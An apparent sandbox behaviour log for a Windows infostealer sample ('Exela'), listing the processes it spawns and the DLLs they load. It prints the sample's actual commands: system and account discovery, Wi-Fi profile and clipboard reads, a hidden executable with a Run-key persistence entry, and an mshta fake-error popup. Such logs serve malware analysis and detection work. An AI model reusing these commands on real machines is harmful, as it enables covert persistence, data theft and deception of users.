Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: libffi-8.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: sbiedll.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: napinsp.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: wshbth.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: nlaapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: winrnr.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
